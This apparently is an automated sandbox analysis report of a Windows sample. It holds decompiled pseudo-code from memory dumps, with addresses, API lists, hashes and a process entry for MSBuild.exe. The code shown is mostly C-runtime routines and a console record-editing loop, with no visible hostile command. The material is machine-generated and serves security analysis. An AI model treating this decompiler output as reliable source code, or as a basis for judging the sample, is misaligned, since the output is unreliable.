				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					_push(0);
					_push( &_v8);
					if( *_t5() != 0x7a) {
						goto L3;
					} else {
						return 1;
					}
				}
			}





                                                        0x00a54ae6
                                                        0x00a54afb
                                                        0x00a54b03
                                                        0x00a54b17
                                                        0x00a54b1a
                                                        0x00a54b05
                                                        0x00a54b05
                                                        0x00a54b0a
                                                        0x00a54b10
                                                        0x00000000
                                                        0x00a54b12
                                                        0x00a54b16
                                                        0x00a54b16
                                                        0x00a54b10

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 00A54AF4
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A54AFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: GetCurrentPackageId$kernel32.dll
                                                        • API String ID: 1646373207-142416881
                                                        • Opcode ID: ca87921db032a520813cb419133bec2266b306eb869e46bd91db55107152d8ca
                                                        • Instruction ID: 5a9c58176eeaa1246e1e6aff3dd78e4bb693c0a07bb0521c0acb50dc11523964
                                                        • Opcode Fuzzy Hash: ca87921db032a520813cb419133bec2266b306eb869e46bd91db55107152d8ca
                                                        • Instruction Fuzzy Hash: 23E0CD3279030077C710A7F09C06B5B327C771570DF100914E102F2080DDB9D9009A51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A536CE, Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A536CE(void* __ebx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t32;
				void* _t36;
				void* _t46;
				void* _t51;
				signed int _t57;
				void* _t58;
				intOrPtr* _t72;
				signed int _t76;
				void* _t77;
				signed int _t81;
				void* _t83;
				void* _t84;
				intOrPtr _t88;

				_t65 = __ebx;
				_push(0x10);
				_push(0xa6cec8);
				E00A554B0(__ebx, __edi, __esi);
				_t81 = __edi | 0xffffffff;
				 *(_t84 - 0x1c) = _t81;
				_t88 =  *((intOrPtr*)(_t84 + 8));
				_t31 = 0 | _t88 != 0x00000000;
				_t89 = _t88 != 0;
				if(_t88 != 0) {
					_t32 = E00A56275(_t31);
					__eflags = _t32;
					if(_t32 < 0) {
						L2:
						return E00A554F5(_t81);
					}
					_t36 = E00A5283E() + 0x20;
					__eflags =  *(_t36 + 0xc) & 0x00000040;
					if(( *(_t36 + 0xc) & 0x00000040) != 0) {
						L15:
						E00A52883(1, E00A5283E() + 0x20);
						 *(_t84 - 4) =  *(_t84 - 4) & 0x00000000;
						 *((intOrPtr*)(_t84 - 0x20)) = E00A57BBC(_t65, E00A5283E() + 0x20);
						_t83 = E00A57B00( *((intOrPtr*)(_t84 + 8)));
						_t46 = E00A531A1( *((intOrPtr*)(_t84 + 8)), 1, _t83, E00A5283E() + 0x20);
						__eflags = _t46 - _t83;
						if(_t46 != _t83) {
							L20:
							E00A57B8B( *((intOrPtr*)(_t84 - 0x20)), E00A5283E() + 0x20);
							 *(_t84 - 4) = 0xfffffffe;
							E00A5381D();
							goto L2;
						}
						_t51 = E00A5283E();
						_t23 = _t51 + 0x24;
						 *_t23 =  *(_t51 + 0x24) - 1;
						__eflags =  *_t23;
						if( *_t23 < 0) {
							__eflags = E00A5283E() + 0x20;
							E00A579A1(E00A5283E() + 0x20, 0xa, E00A5283E() + 0x20);
						} else {
							_t25 = E00A5283E() + 0x20; // 0x20
							_t72 = _t25;
							 *((char*)( *_t72)) = 0xa;
							 *_t72 =  *_t72 + 1;
						}
						_t81 = 0;
						__eflags = 0;
						 *(_t84 - 0x1c) = 0;
						goto L20;
					}
					_t57 = E00A551D0(_t36);
					_t76 = _t57;
					__eflags = _t76 - _t81;
					if(_t76 == _t81) {
						L8:
						_t58 = 0xa6f600;
						L9:
						__eflags =  *(_t58 + 0x24) & 0x0000007f;
						if(__eflags != 0) {
							goto L1;
						}
						__eflags = _t76 - _t81;
						if(_t76 == _t81) {
							L13:
							_t77 = 0xa6f600;
							L14:
							__eflags =  *(_t77 + 0x24) & 0x00000080;
							if(__eflags != 0) {
								goto L1;
							}
							goto L15;
						}
						__eflags = _t76 - 0xfffffffe;
						if(_t76 == 0xfffffffe) {
							goto L13;
						}
						_t77 = ((_t76 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t76 >> 5) * 4));
						goto L14;
					}
					__eflags = _t76 - 0xfffffffe;
					if(_t76 == 0xfffffffe) {
						goto L8;
					}
					_t58 = ((_t57 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t76 >> 5) * 4));
					goto L9;
				}
				L1:
				 *((intOrPtr*)(E00A553A7(_t89))) = 0x16;
				E00A55155();
				goto L2;
			}
















                                                        0x00a536ce
                                                        0x00a536ce
                                                        0x00a536d0
                                                        0x00a536d5
                                                        0x00a536da
                                                        0x00a536dd
                                                        0x00a536e2
                                                        0x00a536e5
                                                        0x00a536e8
                                                        0x00a536ea
                                                        0x00a53704
                                                        0x00a53709
                                                        0x00a5370b
                                                        0x00a536fc
                                                        0x00a53703
                                                        0x00a53703
                                                        0x00a53712
                                                        0x00a53715
                                                        0x00a53719
                                                        0x00a53778
                                                        0x00a53783
                                                        0x00a5378a
                                                        0x00a5379c
                                                        0x00a537a7
                                                        0x00a537b8
                                                        0x00a537c0
                                                        0x00a537c2
                                                        0x00a537f6
                                                        0x00a53802
                                                        0x00a53809
                                                        0x00a53810
                                                        0x00000000
                                                        0x00a53810
                                                        0x00a537c4
                                                        0x00a537c9
                                                        0x00a537c9
                                                        0x00a537c9
                                                        0x00a537cc
                                                        0x00a537e4
                                                        0x00a537ea
                                                        0x00a537ce
                                                        0x00a537d3
                                                        0x00a537d3
                                                        0x00a537d8
                                                        0x00a537db
                                                        0x00a537db
                                                        0x00a537f1
                                                        0x00a537f1
                                                        0x00a537f3
                                                        0x00000000
                                                        0x00a537f3
                                                        0x00a5371c
                                                        0x00a53722
                                                        0x00a53724
                                                        0x00a53726
                                                        0x00a53741
                                                        0x00a53741
                                                        0x00a53746
                                                        0x00a53746
                                                        0x00a5374a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5374c
                                                        0x00a5374e
                                                        0x00a53769
                                                        0x00a53769
                                                        0x00a5376e
                                                        0x00a5376e
                                                        0x00a53772
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a53772
                                                        0x00a53750
                                                        0x00a53753
                                                        0x00000000
                                                        0x00000000
                                                        0x00a53760
                                                        0x00000000
                                                        0x00a53760
                                                        0x00a53728
                                                        0x00a5372b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a53738
                                                        0x00000000
                                                        0x00a53738
                                                        0x00a536ec
                                                        0x00a536f1
                                                        0x00a536f7
                                                        0x00000000

                                                        APIs
                                                        • __ioinit.LIBCMT ref: 00A53704
                                                        • __stbuf.LIBCMT ref: 00A53797
                                                        • _strlen.LIBCMT ref: 00A537A2
                                                        • __ftbuf.LIBCMT ref: 00A53802
                                                          • Part of subcall function 00A553A7: __getptd_noexit.LIBCMT ref: 00A553A7
                                                          • Part of subcall function 00A579A1: __ioinit.LIBCMT ref: 00A579A5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __ioinit$__ftbuf__getptd_noexit__stbuf_strlen
                                                        • String ID:
                                                        • API String ID: 9702468-0
                                                        • Opcode ID: 2ad76b7932cbe165be48fa8e343422a8cf67a44de6e1c2b7a21c89bde6dbd4ed
                                                        • Instruction ID: 545c4606bbc3e7c17f254513939c5c271631a8e671bcf628f3005e1c81b51b5a
                                                        • Opcode Fuzzy Hash: 2ad76b7932cbe165be48fa8e343422a8cf67a44de6e1c2b7a21c89bde6dbd4ed
                                                        • Instruction Fuzzy Hash: 593134F3E042006BEF20BBB4DE4376D2661BFD9363F244205FC119A2D2DA349A498A25
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5D583, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A5D583(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00A57CCC(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00A5D25E( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00A553A7(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                        0x00a5d58b
                                                        0x00a5d590
                                                        0x00a5d5aa
                                                        0x00000000
                                                        0x00a5d5aa
                                                        0x00a5d592
                                                        0x00a5d597
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5d59c
                                                        0x00a5d5b7
                                                        0x00a5d5bc
                                                        0x00a5d5bf
                                                        0x00a5d5c6
                                                        0x00a5d5e5
                                                        0x00a5d5ec
                                                        0x00a5d5ee
                                                        0x00a5d632
                                                        0x00a5d63a
                                                        0x00a5d64f
                                                        0x00a5d651
                                                        0x00a5d661
                                                        0x00a5d661
                                                        0x00a5d665
                                                        0x00a5d667
                                                        0x00a5d66a
                                                        0x00a5d66a
                                                        0x00a5d66a
                                                        0x00a5d66a
                                                        0x00000000
                                                        0x00a5d670
                                                        0x00a5d653
                                                        0x00a5d653
                                                        0x00a5d658
                                                        0x00a5d658
                                                        0x00a5d65b
                                                        0x00000000
                                                        0x00a5d65b
                                                        0x00a5d5f0
                                                        0x00a5d5f3
                                                        0x00a5d5f7
                                                        0x00a5d620
                                                        0x00a5d620
                                                        0x00a5d623
                                                        0x00a5d623
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5d625
                                                        0x00a5d629
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5d62b
                                                        0x00a5d62b
                                                        0x00000000
                                                        0x00a5d62b
                                                        0x00a5d5f9
                                                        0x00a5d5fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5d600
                                                        0x00a5d613
                                                        0x00a5d619
                                                        0x00a5d61c
                                                        0x00a5d61e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5d61e
                                                        0x00a5d5c8
                                                        0x00a5d5cb
                                                        0x00a5d5cd
                                                        0x00a5d5d2
                                                        0x00a5d5d2
                                                        0x00a5d5d7
                                                        0x00000000
                                                        0x00a5d5d7
                                                        0x00a5d59e
                                                        0x00a5d5a3
                                                        0x00a5d5a7
                                                        0x00a5d5a7
                                                        0x00000000

                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5D5B7
                                                        • __isleadbyte_l.LIBCMT ref: 00A5D5E5
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 00A5D613
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 00A5D649
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: f5aff4bd4a7225ec97980906fb66762230c45fad1a421241fe98ba26e66207f2
                                                        • Instruction ID: 70a2871fbcc4e1d9187683b66fd9e3c4b871d9f715aaa8183bbcb6e1ca59b93a
                                                        • Opcode Fuzzy Hash: f5aff4bd4a7225ec97980906fb66762230c45fad1a421241fe98ba26e66207f2
                                                        • Instruction Fuzzy Hash: 8031AF31600216AFDB319F75C844BAA7BA5FF41316F154428EC259B190E770D89ADB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5393A, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A5393A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t21;
				signed int _t28;
				void* _t29;
				signed int _t30;
				void* _t38;
				signed int _t44;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t51;

				_t42 = __edx;
				_t34 = __ebx;
				_push(8);
				_push(0xa6cee8);
				E00A554B0(__ebx, __edi, __esi);
				_t46 =  *((intOrPtr*)(_t47 + 8));
				_t51 = _t46;
				_t20 = 0 | _t51 != 0x00000000;
				_t52 = _t51 != 0;
				if(_t51 != 0) {
					_t21 = E00A56275(_t20);
					__eflags = _t21;
					if(_t21 < 0) {
						L2:
						return E00A554F5(_t21);
					}
					 *((intOrPtr*)(_t47 + 8)) = _t46;
					_t44 = E00A551D0(_t46);
					E00A52844(_t46);
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					E00A52A43(__edx, _t46);
					 *(_t46 + 0xc) =  *(_t46 + 0xc) & 0xffffffcf;
					__eflags = _t44 - 0xffffffff;
					if(_t44 == 0xffffffff) {
						L7:
						_t38 = 0xa6f600;
						L8:
						_t11 = _t38 + 4; // 0xa80
						 *(_t38 + 4) =  *_t11 & 0x000000fd;
						_t28 =  *(_t46 + 0xc);
						__eflags = _t28;
						if(__eflags < 0) {
							_t30 = _t28 & 0xfffffffc;
							__eflags = _t30;
							 *(_t46 + 0xc) = _t30;
						}
						_push(0);
						_push(0);
						_push(_t44);
						_t29 = E00A57840(_t34, _t42, _t44, _t46, __eflags);
						__eflags = _t29 - 0xffffffff;
						if(_t29 == 0xffffffff) {
							_t15 = _t46 + 0xc;
							 *_t15 =  *(_t46 + 0xc) | 0x00000020;
							__eflags =  *_t15;
						}
						 *(_t47 - 4) = 0xfffffffe;
						_t21 = E00A539FA(_t46);
						goto L2;
					}
					__eflags = _t44 - 0xfffffffe;
					if(_t44 == 0xfffffffe) {
						goto L7;
					}
					_t38 = ((_t44 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t44 >> 5) * 4));
					goto L8;
				}
				 *((intOrPtr*)(E00A553A7(_t52))) = 0x16;
				_t21 = E00A55155();
				goto L2;
			}












                                                        0x00a5393a
                                                        0x00a5393a
                                                        0x00a5393a
                                                        0x00a5393c
                                                        0x00a53941
                                                        0x00a53948
                                                        0x00a5394b
                                                        0x00a5394d
                                                        0x00a53950
                                                        0x00a53952
                                                        0x00a5396a
                                                        0x00a5396f
                                                        0x00a53971
                                                        0x00a53964
                                                        0x00a53969
                                                        0x00a53969
                                                        0x00a53973
                                                        0x00a5397c
                                                        0x00a5397f
                                                        0x00a53986
                                                        0x00a5398b
                                                        0x00a53991
                                                        0x00a53995
                                                        0x00a53998
                                                        0x00a539b5
                                                        0x00a539b5
                                                        0x00a539ba
                                                        0x00a539ba
                                                        0x00a539c0
                                                        0x00a539c3
                                                        0x00a539c6
                                                        0x00a539c8
                                                        0x00a539ca
                                                        0x00a539ca
                                                        0x00a539cd
                                                        0x00a539cd
                                                        0x00a539d0
                                                        0x00a539d2
                                                        0x00a539d4
                                                        0x00a539d5
                                                        0x00a539dd
                                                        0x00a539e0
                                                        0x00a539e2
                                                        0x00a539e2
                                                        0x00a539e2
                                                        0x00a539e2
                                                        0x00a539e6
                                                        0x00a539ed
                                                        0x00000000
                                                        0x00a539ed
                                                        0x00a5399a
                                                        0x00a5399d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a539ac
                                                        0x00000000
                                                        0x00a539ac
                                                        0x00a53959
                                                        0x00a5395f
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __flush__getptd_noexit__ioinit__lock_file__write
                                                        • String ID:
                                                        • API String ID: 201936336-0
                                                        • Opcode ID: 3f875bf3ddd5db513382c22b86d3433b75320e4ac5403ade86b255de8780b2db
                                                        • Instruction ID: b056cc965bb26e4a596bb971baff7e1b3f4ee9c689e363a3a79ed9b64073ecdd
                                                        • Opcode Fuzzy Hash: 3f875bf3ddd5db513382c22b86d3433b75320e4ac5403ade86b255de8780b2db
                                                        • Instruction Fuzzy Hash: BA115E73500A009ADF246B78CD2376D7B207F81377F248709EC758A2D2DBB4D6098741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A515D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00A515D0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v16;
				char _v32;
				char _v533;
				char _v543;
				char _v568;
				char _v598;
				char _v604;
				char _v605;
				char* _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebp;
				signed int _t52;
				char* _t63;
				void* _t65;
				intOrPtr _t77;
				signed int _t122;
				void* _t123;
				void* _t124;
				void* _t128;
				void* _t129;

				_t121 = __esi;
				_t120 = __edi;
				_t95 = __ebx;
				_t52 =  *0xa6f360; // 0x51accb5
				_v8 = _t52 ^ _t122;
				_v624 = 0;
				E00A5401F(__ebx, __edx, __edi, __eflags, "cls");
				_t124 = _t123 + 4;
				_v605 = E00A51000(__ebx, __edi, __esi);
				if(_v605 == 0) {
					while(1) {
						_push(E00A5283E());
						E00A52AB0(_t95, _t120, _t121, __eflags);
						_t113 =  &_v32;
						E00A5359B( &_v32);
						E00A5359B( &_v16);
						_t63 = E00A52DAF( &_v32, "rb+");
						_t128 = _t124 + 0x14;
						_v612 = _t63;
						__eflags = _v612;
						if(__eflags != 0) {
							goto L4;
						} else {
							break;
						}
						while(1) {
							L4:
							_t114 = _v612;
							_t65 = E00A52FE7( &_v604, 0x23b, 1, _v612);
							_t129 = _t128 + 0x10;
							__eflags = _t65 - 1;
							if(_t65 != 1) {
								break;
							}
							_t77 = E00A54850( &_v604,  &_v16);
							_t128 = _t129 + 8;
							__eflags = _t77;
							if(__eflags != 0) {
								continue;
							} else {
								goto L6;
								do {
									do {
										L6:
										_push(E00A5283E());
										E00A52AB0(_t95, _t120, _t121, __eflags);
										E00A53A3A(0xa6f0d8,  &_v620);
										_push(E00A5283E());
										E00A52AB0(_t95, _t120, _t121, __eflags);
										_t128 = _t128 + 0x10;
										_t118 = _v620;
										_v616 = _v620;
										_v616 = _v616 - 1;
										__eflags = _v616 - 6;
										if(__eflags > 0) {
											goto L15;
										} else {
											switch( *((intOrPtr*)(_v616 * 4 +  &M00A5190C))) {
												case 0:
													_t118 =  &_v604;
													E00A5359B( &_v604);
													_t128 = _t128 + 4;
													goto L15;
												case 1:
													E00A5359B( &_v598);
													goto L15;
												case 2:
													__ecx =  &_v568;
													E00A5359B( &_v568);
													goto L15;
												case 3:
													__edx =  &_v543;
													E00A5359B(__edx);
													goto L15;
												case 4:
													E00A5359B( &_v533);
													goto L15;
												case 5:
													__ecx =  &_v604;
													E00A5359B( &_v604);
													__edx =  &_v598;
													E00A5359B( &_v598);
													E00A5359B( &_v568);
													__ecx =  &_v543;
													E00A5359B( &_v543);
													__edx =  &_v533;
													E00A5359B(__edx);
													goto L15;
												case 6:
													E00A6945E(__ebx, __edx, __edi, __esi, __eflags);
													goto L25;
											}
										}
										goto L25;
										L15:
										__eflags = _v620 - 1;
									} while (__eflags < 0);
									__eflags = _v620 - 8;
								} while (__eflags > 0);
								_push(1);
								_push(0xfffffdc5);
								_push(_v612);
								E00A53122(_t95, _t118, _t120, _t121, __eflags);
								_push(_v612);
								_push(1);
								_push(0x23b);
								_push( &_v604);
								E00A532F8(_t95,  &_v604, _t120, _t121, __eflags);
								_push(1);
								_push(0xfffffdc5);
								_push(_v612);
								E00A53122(_t95,  &_v604, _t120, _t121, __eflags);
								_t114 =  &_v604;
								E00A52FE7( &_v604, 0x23b, 1, _v612);
								_t129 = _t128 + 0x38;
								_v605 = 5;
								break;
							}
							goto L25;
						}
						__eflags = _v605 - 5;
						if(__eflags != 0) {
							E00A53A3A(0xa6f008,  &_v605);
							_t124 = _t129 + 8;
						} else {
							E00A5401F(_t95, _t114, _t120, __eflags, 0xa6f000);
							_push(_v612);
							E00A52986(_t95, _t120, _t121, __eflags);
							E00A53A3A(0xa6f004,  &_v605);
							_t124 = _t129 + 0x10;
							_v624 = _v624 + 1;
						}
						_t113 = _v605;
						__eflags = _v605 - 0x59;
						if(__eflags == 0) {
							continue;
						} else {
							__eflags = _v605 - 0x79;
							if(__eflags == 0) {
								continue;
							} else {
								_push(_v612);
								E00A52986(_t95, _t120, _t121, __eflags);
								E00A6945E(_t95, _t113, _t120, _t121, __eflags);
							}
						}
						goto L25;
					}
					E00A6945E(_t95,  &_v32, _t120, _t121, __eflags);
				} else {
				}
				L25:
				return E00A548DC(_t95, _v8 ^ _t122, _t113, _t120, _t121);
			}


























                                                        0x00a515d0
                                                        0x00a515d0
                                                        0x00a515d0
                                                        0x00a515d9
                                                        0x00a515e0
                                                        0x00a515e3
                                                        0x00a515f2
                                                        0x00a515f7
                                                        0x00a515ff
                                                        0x00a5160e
                                                        0x00a51615
                                                        0x00a51624
                                                        0x00a51625
                                                        0x00a5162d
                                                        0x00a51631
                                                        0x00a5163d
                                                        0x00a5164e
                                                        0x00a51653
                                                        0x00a51656
                                                        0x00a5165c
                                                        0x00a51663
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5166f
                                                        0x00a5166f
                                                        0x00a5166f
                                                        0x00a51684
                                                        0x00a51689
                                                        0x00a5168c
                                                        0x00a5168f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a516a0
                                                        0x00a516a5
                                                        0x00a516a8
                                                        0x00a516aa
                                                        0x00000000
                                                        0x00a516b0
                                                        0x00000000
                                                        0x00a516b0
                                                        0x00a516b0
                                                        0x00a516b0
                                                        0x00a516bf
                                                        0x00a516c0
                                                        0x00a516d4
                                                        0x00a516eb
                                                        0x00a516ec
                                                        0x00a516f1
                                                        0x00a516f4
                                                        0x00a516fa
                                                        0x00a51709
                                                        0x00a5170f
                                                        0x00a51716
                                                        0x00000000
                                                        0x00a5171c
                                                        0x00a51722
                                                        0x00000000
                                                        0x00a51729
                                                        0x00a51730
                                                        0x00a51735
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51744
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51751
                                                        0x00a51758
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51762
                                                        0x00a51769
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5177a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51784
                                                        0x00a5178b
                                                        0x00a51793
                                                        0x00a5179a
                                                        0x00a517a9
                                                        0x00a517b1
                                                        0x00a517b8
                                                        0x00a517c0
                                                        0x00a517c7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a517d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51722
                                                        0x00000000
                                                        0x00a517db
                                                        0x00a517db
                                                        0x00a517db
                                                        0x00a517e8
                                                        0x00a517e8
                                                        0x00a517f5
                                                        0x00a517f7
                                                        0x00a51802
                                                        0x00a51803
                                                        0x00a51811
                                                        0x00a51812
                                                        0x00a51814
                                                        0x00a5181f
                                                        0x00a51820
                                                        0x00a51828
                                                        0x00a5182a
                                                        0x00a51835
                                                        0x00a51836
                                                        0x00a5184c
                                                        0x00a51853
                                                        0x00a51858
                                                        0x00a5185b
                                                        0x00000000
                                                        0x00a5185b
                                                        0x00000000
                                                        0x00a516aa
                                                        0x00a51870
                                                        0x00a51873
                                                        0x00a518c2
                                                        0x00a518c7
                                                        0x00a51875
                                                        0x00a5187a
                                                        0x00a51888
                                                        0x00a51889
                                                        0x00a5189d
                                                        0x00a518a2
                                                        0x00a518ae
                                                        0x00a518ae
                                                        0x00a518ca
                                                        0x00a518d1
                                                        0x00a518d4
                                                        0x00000000
                                                        0x00a518da
                                                        0x00a518e1
                                                        0x00a518e4
                                                        0x00000000
                                                        0x00a518ea
                                                        0x00a518f0
                                                        0x00a518f1
                                                        0x00a518f9
                                                        0x00a518f9
                                                        0x00a518e4
                                                        0x00000000
                                                        0x00a518d4
                                                        0x00a51665
                                                        0x00000000
                                                        0x00a51610
                                                        0x00a518fe
                                                        0x00a5190b

                                                        APIs
                                                        • __wsystem.LIBCMT ref: 00A515F2
                                                          • Part of subcall function 00A5401F: __wdupenv_s.LIBCMT ref: 00A54038
                                                          • Part of subcall function 00A5401F: _free.LIBCMT ref: 00A540E7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __wdupenv_s__wsystem_free
                                                        • String ID: cls$rb+
                                                        • API String ID: 1469334009-1696901130
                                                        • Opcode ID: 42e17db771be2037591c09cccb77a435109592cf73930cf7e06cd38e9b0919f8
                                                        • Instruction ID: ae507f70c42c062aae03b73769b04664c2c1305ee294a0ee65983a0f79a701f5
                                                        • Opcode Fuzzy Hash: 42e17db771be2037591c09cccb77a435109592cf73930cf7e06cd38e9b0919f8
                                                        • Instruction Fuzzy Hash: 4501B5B1E0420C9EDB20FBB09D1B77E76747B54302F4400B8ED1A96242FB35964CCB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: MSBuild.exe PID: 2204 Parent PID: 5816 MSBuild.exeCOMMON

                                                        Executed Functions

                                                        Function 06A73558, Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1047696391.0000000006A70000.00000040.00000001.sdmp, Offset: 06A70000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
